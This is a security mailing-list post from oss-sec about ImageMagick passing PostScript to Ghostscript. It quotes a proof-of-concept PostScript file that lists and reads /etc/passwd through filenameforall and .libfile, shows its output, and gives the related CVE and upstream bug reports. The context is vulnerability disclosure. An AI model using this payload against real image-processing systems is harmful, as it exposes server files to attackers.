oss-sec mailing list archives
Re: ImageMagick identify "d:" hangs
From: Florian Weimer <fw () deneb enyo de>
Date: Thu, 29 Sep 2016 08:25:54 +0200
* Tavis Ormandy:
Here is the code I'm testing with (Note: I really don't know much postscript - and I hate it). $ cat test.ps /dumpname { dup % copy filename dup % copy filename print % print filename (\n) print % print newline status % stat filename { (stat succeeded\n) print ( ctime:) print 64 string cvs print ( atime:) print 64 string cvs print ( size:) print 64 string cvs print ( blocks:) print 64 string cvs print (\n) print (\n) print }{ (unable to stat\n\n) print } ifelse .libfile % open as library { (.libfile returned file\n\n) print 64 string readstring pop % discard result (should proably test) print (\n) print }{ (.libfile returned string\n) print print (\n) print } ifelse } def (/etc/pass*) /dumpname load 256 string filenameforall
filenameforall was fixed as part of this: http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8 http://bugs.ghostscript.com/show_bug.cgi?id=694724 This also covers getenv and has already been assigned CVE-2013-5653.
$ identify test.ps /etc/passwd stat succeeded ctime:1474998792 atime:1474998792 size:2662 blocks:8 .libfile returned file
.libfile is not yet fixed upstream. I reported this upstream: http://bugs.ghostscript.com/show_bug.cgi?id=697169
Current thread:
- ImageMagick identify "d:" hangs Bob Friesenhahn (Sep 27)
- Re: ImageMagick identify "d:" hangs Jakub Wilk (Sep 27)
- Re: ImageMagick identify "d:" hangs Bob Friesenhahn (Sep 27)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 28)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 28)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 28)
- Re: ImageMagick identify "d:" hangs Bob Friesenhahn (Sep 28)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 28)
- Re: ImageMagick identify "d:" hangs Florian Weimer (Sep 28)
- Re: ImageMagick identify "d:" hangs Bob Friesenhahn (Sep 27)
- Re: ImageMagick identify "d:" hangs Jakub Wilk (Sep 27)
- Re: ImageMagick identify "d:" hangs Florian Weimer (Sep 28)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 29)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 29)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 30)
- Re: ImageMagick identify "d:" hangs Florian Weimer (Sep 30)
- Re: ImageMagick identify "d:" hangs Tavis Ormandy (Sep 30)